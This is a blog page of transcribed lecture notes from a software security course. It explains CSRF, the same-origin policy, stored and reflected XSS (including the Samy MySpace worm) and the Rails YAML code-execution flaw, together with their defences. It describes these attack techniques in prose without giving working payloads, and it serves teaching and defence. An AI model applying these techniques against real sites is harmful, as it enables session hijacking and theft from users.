CSRF.   The target of the attack is a user with   an account on a vulnerable server.   The goal of the attack is to issue   requests on the user's behalf.   That look to the server to be legitimate.   To ensure legitimacy, the requests   are issued from the user's browser,   which will send along   the needed session cookies.   For the request to come from the browser,   the user must be tricked into clicking   a link while logged into a sensitive site.   In the previous depiction, this happened   when visiting a malicious site,   which sent a request to a URL   embedded in an image tag.   The user could also be tricked to click   a link in a spam email, which will get,   which will get sent by the browser.   The link could be disguised, for example,   by email formatting, to look benign.   CSRF works,   because certain sorts of request to   the vulnerable site have the same   structure minus the session information.   Let's look into this in more detail.   So, how can we protect   against CSRF attacks?   One way to do it is to pay attention   to the Referer field that's set   by the browser when it sends   an HTTP request to the server.   We call the request that we saw.   In the example earlier in this unit, where   we clicked a link on the Reddit.com site.   Here we can see that   the referer is filled in with   the original page on   which that link resided.   What a server could do is check that when   it receives a request, especially one   that's sensitive, that the referer   field only includes URLs for that site.   Or from any trusted location from which   the link could've been generated.   In our example, the referer should   not include attacker.com and   it would reject the request.   So, the pages that a user could   legitimately reach should be   allowed as referer fields.   The problem here is that   the refer field is optional.   Not all browsers send it along.   One way to deal with this problem is to   use what's called lenient   referrer checking.   That is we should block   requests with a bad refer.   For example,   attacker.com in our prior example.   But allow requests with no refer,   for example,   because the browser just   doesn't include it.   So, then the question is,   is a missing refer always harmless,   assuming that the browser is legitimate?   Unfortunately, the answer is no.   Attackers can be clever in   sending redirect requests and   other protocol messages to.   Cause the referrer to be removed.   For example, it can bounce a user off   an FTP page that the attacker controls.   And the FTP request will not   include a referrer header.   The attacker could also exploit   a browser vulnerability, and   hack the browser to not   include the referrer field.   Or could mangle the web request in   transit by snooping on the link.   Another approach is to,   you secretized links.   The idea here is similar to hidden form   fields, where we used capabilities.   Here the hidden form field will be,   will include a secret that the attacker   has a difficult time guessing.   So recall that the attacker relies   on the cookie already being   present in the user's cache,   so that when the request to   the remote site is initiated   the cookie goes along with it.   But the attacker does not know what   the contents of the cookie are.   It doesn't know what is   expected on the page that   would normally allow such requests.   So if in that page, we can embed a secret   that the attacker wouldn't know, and   the server only allows   the request if that secret is   included say as a hidden form field.   Then we protect against   the attack that we saw before.   That is attacks initiated   indirectly from a remote site.   We can even make the secret equal to   the value in the session cookie because,   as I said before the attacker   has no way to see the cookie.   The attacker can only cause the request   to go out without knowing exactly what   that request contains.   And web frameworks help here.   For example, Ruby on Rails is   a web framework, that makes it   easy to write multi-tier web applications,   and Rails automatically embeds such   secrets in the links that it generates for   the webpages of the sites it produces.

Web 2.0

[MUSIC]   So far we've seen that the server   will produce static or   dynamic HTML that it sends   to the browser to render.   Recall that static HTML is   unchanged from request to request,   whereas dynamic HTML is   generated at the server, for   example by running a PHP program   which may query a database.   Either way,   HTML pages may contain programs written   in a language called Javascript.   And these programs will execute   at the client, and perform fur,   further rendering and   content production on the page.   So here's a little example of an HTML   file that may be sent to the client.   You can see it has the standard tags,   it also has tags script that indicate the   beginning and end of a Javascript program.   Here the program sets two   local variables a and b and   then invokes document.write to   modify the contents of the page.   The contents of the page   will include world,   the value three which is the sum a plus b,   and then a closed bold face tag   which closes off the open bold   face tag that was at the top.   When this program is rendered by the   browser it looks like this on the page.   >> Javascript is a programming   language who's programs called   scripts implement client side   portions of a web application.   These programs run in the browser and   therefore make the web   experience more interactive.   In fact, the web experience is so much   better when using Javascript that people   marked the point at which Javascript   came into heavy use as web 2.0.   Javascript programs are executed   in the browser, and as just shown,   can be used to alter a web page's   contents to determine what is displayed.   To access page elements   Javascript programs use   the document object model or DOM.   Javascript programs can also   perform interactive processing.   For example, they can track mouse   movements to implement drag and   drop or run code to process button clicks.   In addition to event handlers   being used to update a page,   they can be used to issue web requests and   to read replies.   Requests can be issue asynchronously,   leading to a programming   pattern called AJAX.   This acronym stands for   asynchronous Javascript plus XML.   It first saw use in the early 2000s and   then saw widespread deployment in Google   Mail and Google Maps in 2004 and 2005.   These we applications for   email and maps were far more responsive   then their web 1.0 counterparts.   Finally, the most relevant part of our   of Javascript to our discussion now   is that programs can read and   modify cookies.   Javascript is a powerful   programming language with access to   sensitive resources   maintained by the browser.   And therefore the browser needs   to enforce a security policy with   respect to what Javascript   programs can do.   In particular if I use my browser to   visit bank.com to do my banking but   I also use it to visit   attacker.com I don't want   attacker.com Javascript programs   to be able to access my bank data.   How might they do this?   Since Javascript programs can read   cookies, then without security protection   a script from attacker.com could run and   alter the layout of bank.com's website,   which say could be running in   another browser, browser window.   Or it could intercept keystroke events to   sniff the user's password to bank.com.   It could read cookies stored by bank.com.   If cookies include session identifiers   then the attacker.com script could issue   web requests as if they were   from the authenticated user.   To avoid these problems browsers implement   the so-called same origin policy or SOP.   The browser associates the elements of   a web page, including it's lay out,   cookies, events, and so on with an origin.   The origin is primarily   defined by the hostname that   the web page originated from,   for example bank.com.   The same origin policy states   that a web page's elements can   only be accessed by scripts with   the same origin as the page.   So to be clear,   according to the same origin policy,   Javascript programs are limited   in the cookies that they access.   Here we see a cookie that was set and   stored into the cookie cache.   And according to the rules the value   should only be reachable by   any domain ending in .zdnet.com.   That is the origin of the cookie.   We can see this in the domain part of   the set cookie attribute shown at the top.   Any other JavaScript program whose   origin is different than zdnet.com will   not have access to that cookie.

Cross-site Scripting

To work around the same origin policy,    attackers can try to inject code using    an attack called cross-site scripting.    Unfortunately, this    attack is quite common.    For example, here is a CERT    advisory about Huawei modems.    Notice that, it says that the broadband    modems include a web interface, and    this web interface is vulnerable    to a cross-site scripting attack.    A cross-site scripting, or XSS attack.    Aims to subvert the same origin policy.    In particular, an attacker can    construct a malicious script to try to    trick a user's browser into running it as    if the script came from a trusted origin.    Doing so gives the script access    to the sensitive content and    pages from that origin.    A cross-site scripting attack    works by fooling the victim's site    into sending the script    to the user's browser,    which will run it with the full    privileges of the victim.    Let's see how this can be achieved.    There are 2 types of    cross-site scripting attack.    The first we'll talk about    is called stored or,    persistent cross-site scripting.    In this attack, the attacker leaves their    script on the vulnerable web server, for    example bank.com.    The server will later unwittingly    send that script to your browser.    Your browser, none the wiser,    will execute it within the same    origin as the bank.com server.    Visualized it looks like this.    First, we have the bad,    website bad.com, and    we have the vulnerable website bank.com.    Step one, bad.com injects a malicious    script to the bank.com website.    Second, a client connects to the bank.com    site, and bank.com unwittingly    sends the malicious script along with its    content back to the client's browser.    The client's browser will then execute    that malicious script as though    the bank website intended to provide it.    As a result, that script can do nefarious    things like perform attacker actions,    such as initiate a bank transfer, or    steal secret data like document cookies    to send back to the bad.com site.    So in summary, the target is a user    with a JavaScript-enabled browser who    visits a user-influenced content page.    That is a page whose content can be    influenced by prior interactions with    users, like the bad.com site.    The attack goal is to run a script    in the user's browser with    the same access provided by    the server's regular scripts, and    in this way subvert    the same-origin policy.    To do this, the attacker needs the ability    to leave content on the web server, for    example, using an ordinary browser.    The attacker might also have a website    to collect stolen information.    And the key trick here is that    the server will fail to ensure that    content uploaded to it's page does    not contain embedded scripts.    Let's look at an example of a cross-side    scripting attack, the Samy MySpace worm.    So MySpace was a social networking site.    Prior to the rise of Facebook    that was very popular, and    it allowed people to    create custom webpages.    Samy embedded JavaScript    in his MySpace page.    MySpace attempted to filter these scripts,    but in this case it failed.    As a result, users who visited    Samy's page ran the program,    which made them friends with Samy,    displayed, but most of all,    Samy is my hero on their profile,    installed the program in their profile so    a new user who viewed the profile    got infected, and as a result,    Samy went from 73 friends to one    million friends in 20 hours.    And took MySpace down for    a weekend, to boot.    The second type of cross-site    scripting attack is called reflected    cross-site scripting.    Here, the attacker gets you to    send the bank.com server a URL,    that includes in it some JavaScript code.    The bank.com site will echo some or all of    that script back to you in it's response.    And your browser none the wiser will    execute the script in the response with    the same origin as bank.com.    So here this is visualized.    The browser will visit bad.com,    the nefarious website.    And it will send back a malicious page.    The client will then click on    a link on that malicious page,    which will take it to bank.com.    The link will contain    some JavaScript code.    Bank.com will then echo back the link    in it's response to the user.    And the browser will then execute    the script as though the server meant to    provide it.    Once again the attacker can perform    nefarious actions as a result.    So the key here is echoed input.    Reflected cross-site scripting    attacks need to find instances of    good web servers that will echo user    input back in the HTML response.    So, for example, here's an input from    bad.com, where to the search term,    it provides the term socks.    When this goes to victim.com, and    it sends the results back, notice    that socks are included in the body.    Now, the problem arises when.    That input includes scripts, so here's an    example script that's included in the URL.    If that script is not filtered out,    it will be included in    the body returned from victim.com, and    the JavaScript interpreter running in    the user's browser will execute that    script rather than simply print it out.    And of course the script will    execute within victim.com's origin.    To summarize, a reflected XSS attack,    targets someone who    is using a JavaScript enabled browser    to access a vulnerable web service.    The service's vulnerability is    that it echoes back part of    the URLs it reviews in    its output responses.    The attacker goal is to run    the attacker script as if it had    the origin of the victim's site.    The attacker does this by    getting a user to click on    a URL that contains JavaScript code.    This code is then reflected in    the server's response to the browser.    And, so the browser runs the script    as if it were from the origin server.    The key, here is that the origin server    reflects the attacker script, unchanged.    This, indifferent reflection of    the input points to the proper defense.    Validate the input.    In particular, the vulnerable    server should either check or    sanitize input from untrusted sources.    One form of validation is sanitization.    In particular a server can remove all    executable portions of untrusted that    is user-provided content that    it could appear in HTML pages.    For example, it might look for    script tags and filter them out.    Then instead of running the script,    the browser will end up    printing it in the document.    This might look a little strange,    but it will be harmless.    Such filtering is often done in    the comment sections of blogs.    Commentors are permitted to provide rich    content like bold face formatting or    italics or underlying.    And they can express this    using various HTML tags.    However, they are not permitted    to include tags that would    demarcate Java Script code.    Blacklisting particular tags,    like the script tag, and    removing them from the input    is a natural idea.    The problem with it, is that there are    many ways to introduce Java Script code.    You may think you have them all,    when you actually don't.    For example, it turns out that you can    embed JavaScript as XML encoded files or    as a cascading style sheet,    that is, CSS tag.    Moreover, even if you    found all of the tags that    are specifically indicated    as allowing scripts.    There may be other ways of specifying    code that is browser specific.    In particular, browsers have often    been known to try to be helpful, and    render manged input.    Such permissiveness is good for making    busted websites look okay to a user,    but it can be exploited    by a clever attacker.    For example, such permissiveness    was the flaw that allowed Samy to    evade the MySpace filter.    Internet Explorer permitted splitting the    JavaScript tag into two words, Java and    Script, across two lines.    Even though other browsers would not,    interpret this as being a JavaScript tag.    This split tag evaded the MySpace filters.    A better validation approach    is to use a white list.    In particular, a site can allow    a particular small set of tags.    It can then check that the input    only has those tags in it.    Any other tags that appear well in    that case the input is rejected.    The same sort of white list applies to    all elements of a page that could be    affected by untrusted sources.    Returning to our blog example, a white    list filter could check that the urls or    other user comments contain only bold    face, italics, an underline tags, and    no other tags.    Or the blog could permit only a more    limited language for providing comments.    So rather than full HTML,    it could allow, say, markdown.    One note.    We have just considered two different    attacks with strikingly similar names.    Cross-site scripting, and    cross-site request forgery.    What the attacks have in common,    is that one site tries to    act with the privileges of another site,    hence the phrase, cross site.    XSS works by exploiting the trust    a browser has in data sent to it    from a legitimate website.    So, the attacker tries to manipulate    what the site sends to the browser.    CSRF exploits the trust a website has in    data sent from a semi-trusted browser.    So, the attacker tries to manipulate,    what the browser sends to the site.    In short, it's all about exploiting trust.    The right defence is to reduce    that trust as much as possible.    In particular, by using input validation.    This theme comes up again and    again in web security, and indeed,    in distributed system security generally.    Let's finish off this unit    with one more example.    One popular framework for writing web    applications is called Ruby on Rails.    Server side web applications are written    in the Ruby programming language, and    the Rails framework makes it easy for    these applications to work via the web.    Parameters in web requests sent    to Rails applications can be    Ruby objects encoded in XML, or    as a format called YMAL within XML.    YAML is particularly desirable    because it's easy to read and    Ruby has good support for it.    In particular, Ruby makes it easy to    encode Ruby objects into YAML, and    likewise, decode YAML    strings into Ruby objects.    When those Ruby objects are pre, represent    integers or strings or enumerated types,.    Then web app behavior    proceeds as we might hope.    However YAML can encode any object    which it does by embedding Ruby code.    Since the default YAML decoder can    be used to decode arbitrary objects,    it can thus decode arbitrary Ruby code.    With a little work the decoder can be    made to invoke the code of the objects it    has just decoded.    This means that an attacker can    send a carefully crafted message to    any Ruby on Rails application, and get    it to run code on the attacker's behalf.    Woah.    Once again the problem here is    accepting input without validating it.    The problem is hidden from the application    developers because the bug is in    the Ruby on Rails framework and    not the application.    A fix to validate the input might    be to reject YAML altogether, or    to reject YAML-encoded    objects that embed code.    Of course, as with XSS,    holes in the filters mean that    vulnerabilities will persist.    To conclude,    web security introduces a plethora of    vulnerabilities that application    writers must guard against.    All of them can be boiled down    to mismatches with trust.    If we cannot completely trust    the source of some input, then we    must validate that input so that it,    to make sure that it cannot cause harm.    When considering means of validation,    checking is preferred to sanitization and    whitelisting is preferred to blacklisting.    In our next unit, we will see how input    validation is just one instance of    a general set of principles we should    follow when designing secure applications.

4 comments:

AccessDeniedOctober 3, 2016 at 12:49 AM
can you please help me in solving project 2 of this course
AccessDeniedOctober 3, 2016 at 12:50 AM
project 2 & project 3 of software security course.
PinkiJune 13, 2025 at 4:29 AM
This comment has been removed by the author.
PinkiJune 13, 2025 at 4:30 AM
Thanks for sharing these notes! For those interested in protecting digital systems and mastering ethical hacking, the B.Sc. (Hons.) in Cyber Security is a great career-starting programme. Stay ahead in the digital era!

MyClassNotes

Monday, August 31, 2015

Software Security - Week 3 - Notes

4 comments: